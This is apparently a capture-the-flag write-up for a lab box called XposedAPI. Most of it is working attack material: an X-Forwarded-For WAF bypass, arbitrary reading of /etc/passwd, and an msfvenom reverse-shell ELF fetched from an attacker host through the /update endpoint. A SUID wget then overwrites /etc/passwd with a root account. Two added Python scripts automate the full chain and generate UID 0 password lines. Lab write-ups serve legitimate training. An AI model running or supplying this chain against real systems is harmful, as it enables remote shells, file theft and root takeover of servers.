Enumeration
...
13337/tcp open http Gunicorn 20.0.4
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn/20.0.4
|_http-title: Remote Software Management API
...
/logs
Methods: GET
/update
Methods: POST
Updates the app using a linux executable. Content-Type: application/json {"user":"", "url":""}
/restart
Methods: GET
POST /update HTTP/1.1
...
Content-Type: application/json
Content-Length: 48
{"user":"test", "url":"http://192.168.49.60/"}
Response:
Invalid username.
The endpoint checks the username before it fetches anything, so we need the name of a real account on the box.
GET /logs HTTP/1.1
Response:
WAF: Access Denied for this Host.
The "host" the WAF checks is taken from the X-Forwarded-For header rather than the real source address, so add X-Forwarded-For: 127.0.0.1 to the request:
GET /logs HTTP/1.1
...
X-Forwarded-For: 127.0.0.1
Response:
Error! No file specified. Use file=/path/to/log/file to access log files.
GET /logs?file=/etc/passwd HTTP/1.1
...
X-Forwarded-For: 127.0.0.1
Response:
root:x:0:0:root:/root:/bin/bash
...
clumsyadmin:x:1000:1000::/home/clumsyadmin:/bin/sh
The file parameter is not restricted to the log directory, so this is an arbitrary file read. /etc/passwd gives us the local account clumsyadmin to use against /update.
Initial Access
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.60 LPORT=80 -f elf -o reverse.elf
Host the ELF over HTTP on the attacking machine (the request below fetches it as shell.sh; the name does not matter, the content must be the executable) and have a listener ready on the LPORT. Both the payload URL and LPORT use port 80 here: if the download happens when /update is called, stop the web server and start the listener before the restart, otherwise choose a different LPORT.
POST /update HTTP/1.1
...
Content-Type: application/json
{"user":"clumsyadmin", "url":"http://192.168.49.60/shell.sh"}
Response:
Update requested by clumsyadmin. Restart the software for changes to take effect.
GET /restart HTTP/1.1
A GET alone does not trigger the restart; it has to be confirmed with a POST:
POST /restart HTTP/1.1
...
{"confirm":"true"}
The software restarts, runs the ELF, and the reverse shell comes back as clumsyadmin.
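The whole chain above, automated as an added example (this is example code written for this page, not the writeup's own tooling): spoof X-Forwarded-For to pass the WAF, read /etc/passwd through /logs?file=, try each login-capable account against /update until it stops answering "Invalid username.", then confirm /restart with a POST. It assumes the target base URL and payload URL are given on the command line, that the WAF only looks at X-Forwarded-For, and that a successful /update answers with "Update requested", matching the responses shown above. The CannedSession class is an offline stand-in for requests.Session whose replies are modelled on those responses (its passwd sample is constructed and abridged).

```python
#!/usr/bin/env python3
"""Automates the XposedAPI chain: X-Forwarded-For WAF bypass, arbitrary file read
through /logs?file=, username discovery from /etc/passwd, /update with a hosted
payload, then a confirmed POST /restart. Example code for this page, not the
original writeup's tooling. Assumptions: base URL and payload URL come from argv,
the WAF only inspects X-Forwarded-For, and /update says "Update requested" on
success (as in the responses shown above)."""
import sys

WAF_BYPASS = {"X-Forwarded-For": "127.0.0.1"}  # spoofed "local" client
NO_LOGIN_SHELLS = ("/nologin", "/false", "/sync", "/shutdown", "/halt")


def read_file(session, base, path):
    """Arbitrary file read via /logs?file=; fails loudly if the WAF still blocks us."""
    r = session.get(f"{base}/logs", params={"file": path}, headers=WAF_BYPASS)
    if "Access Denied" in r.text:
        raise RuntimeError("X-Forwarded-For bypass rejected")
    return r.text


def candidate_users(passwd_text):
    """Account names from /etc/passwd whose shell can actually log in."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(NO_LOGIN_SHELLS):
            users.append(fields[0])
    return users


def request_update(session, base, user, payload_url):
    """POST /update; True once the API accepts the username."""
    body = {"user": user, "url": payload_url}
    r = session.post(f"{base}/update", json=body, headers=WAF_BYPASS)
    return "Update requested" in r.text


def find_valid_user(session, base, payload_url):
    """Try every login-capable account until /update stops saying 'Invalid username.'"""
    for user in candidate_users(read_file(session, base, "/etc/passwd")):
        if request_update(session, base, user, payload_url):
            return user
    return None


def restart(session, base):
    """A plain GET is not enough; the restart must be confirmed by POST."""
    r = session.post(f"{base}/restart", json={"confirm": "true"}, headers=WAF_BYPASS)
    return r.status_code


class CannedSession:
    """Offline stand-in for requests.Session. Replies are modelled on the ones shown
    above; the passwd sample is constructed and abridged, status codes are assumed."""
    PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
              "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
              "clumsyadmin:x:1000:1000::/home/clumsyadmin:/bin/sh\n")

    class _Resp:
        def __init__(self, text, status_code=200):
            self.text, self.status_code = text, status_code

    def get(self, url, params=None, headers=None):
        if (headers or {}).get("X-Forwarded-For") != "127.0.0.1":
            return self._Resp("WAF: Access Denied for this Host.", 403)
        if not params or "file" not in params:
            return self._Resp("Error! No file specified. Use file=/path/to/log/file to access log files.")
        return self._Resp(self.PASSWD if params["file"] == "/etc/passwd" else "")

    def post(self, url, json=None, headers=None):
        if url.endswith("/update"):
            if (json or {}).get("user") == "clumsyadmin":  # only the real account is accepted
                return self._Resp("Update requested by clumsyadmin. Restart the software for changes to take effect.")
            return self._Resp("Invalid username.")
        return self._Resp("")  # /restart


def main(base, payload_url):
    import requests  # only needed for a live run, so the module imports without it
    s = requests.Session()
    user = find_valid_user(s, base, payload_url)
    if user is None:
        sys.exit("[-] no account accepted by /update")
    print(f"[+] /update accepted user {user}; restarting to execute the payload")
    print(f"[+] /restart -> HTTP {restart(s, base)}")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: xposedapi.py http://TARGET:13337 http://LHOST/shell.sh")
    main(sys.argv[1], sys.argv[2])
```

Run it as `python3 xposedapi.py http://TARGET:13337 http://192.168.49.60/shell.sh` with the ELF being served at that URL and the reverse-shell listener ready; the script stops at the first account /update accepts, so root is tried before clumsyadmin simply because it appears first in /etc/passwd.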
PrivEsc
clumsyadmin@xposedapi:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/wget
wget is SUID root, so anything it downloads with -O is written as root, /etc/passwd included.
Copy the contents of /etc/passwd to your host as passwd and append a UID 0 user to it. The \$ escapes stop the shell from expanding $1 and $ignite inside the double quotes:
echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd
The hash is MD5-crypt ($1$) of pass123 with the salt ignite, so the new account is ch:pass123. Starting from the full copied file rather than a single line keeps the existing accounts intact when it is written back.
clumsyadmin@xposedapi:/$ wget http://192.168.49.60/passwd -O /etc/passwd
clumsyadmin@xposedapi:/$ su ch
Password: pass123
Because wget runs as root, -O overwrites /etc/passwd with our copy, and su ch gives a UID 0 shell.
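Rather than reusing the published ignite/pass123 hash, generate your own passwd line. The following is an added example written for this page (not the writeup's tooling): it implements the classic MD5-crypt ($1$) scheme from the original FreeBSD crypt(3), which is the scheme behind both `openssl passwd -1` and the hash in the echo line above, and wraps it in a helper that emits the UID 0 entry. The user name, password and salt are chosen by the operator (salt at most 8 characters from the crypt alphabet); the gecos, home and shell default to the values used above.

```python
#!/usr/bin/env python3
"""MD5-crypt ($1$) hash generation and /etc/passwd line builder for the SUID-wget
privilege escalation above. Example code for this page, not the writeup's own
tooling. Assumptions: operator-chosen user/password/salt; salt is at most 8 chars."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value, count):
    """crypt's base64 variant: emit `count` characters, low 6 bits first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5_crypt(password: bytes, salt: bytes) -> str:
    """Return the "$1$<salt>$<22 chars>" string exactly as crypt(3)/openssl produce it."""
    salt = salt[:8]                                   # MD5-crypt uses at most 8 salt bytes
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                              # fold in len(password) bytes of the alternate sum
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(password)
    while bit:                                        # one byte per bit of len(password): NUL or pw[0]
        ctx.update(b"\0" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                             # fixed 1000-round stretching
        rnd = hashlib.md5(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    encoded += _to64(final[11], 2)
    return (MAGIC + salt).decode() + "$" + encoded


def passwd_line(user, password, salt, uid=0, gid=0, gecos="root", home="/root", shell="/bin/bash"):
    """A root-equivalent (UID 0) entry ready to append to the copied passwd file."""
    digest = md5_crypt(password.encode(), salt.encode())
    return f"{user}:{digest}:{uid}:{gid}:{gecos}:{home}:{shell}"


if __name__ == "__main__":
    # Reproduces the line from the echo command above; pick your own values in practice.
    print(passwd_line("ch", "pass123", "ignite"))
```

Append the printed line to the copied passwd file and serve it as before; since the hash is computed locally, no `\$` escaping is needed and nothing about the credentials is guessable from a public writeup.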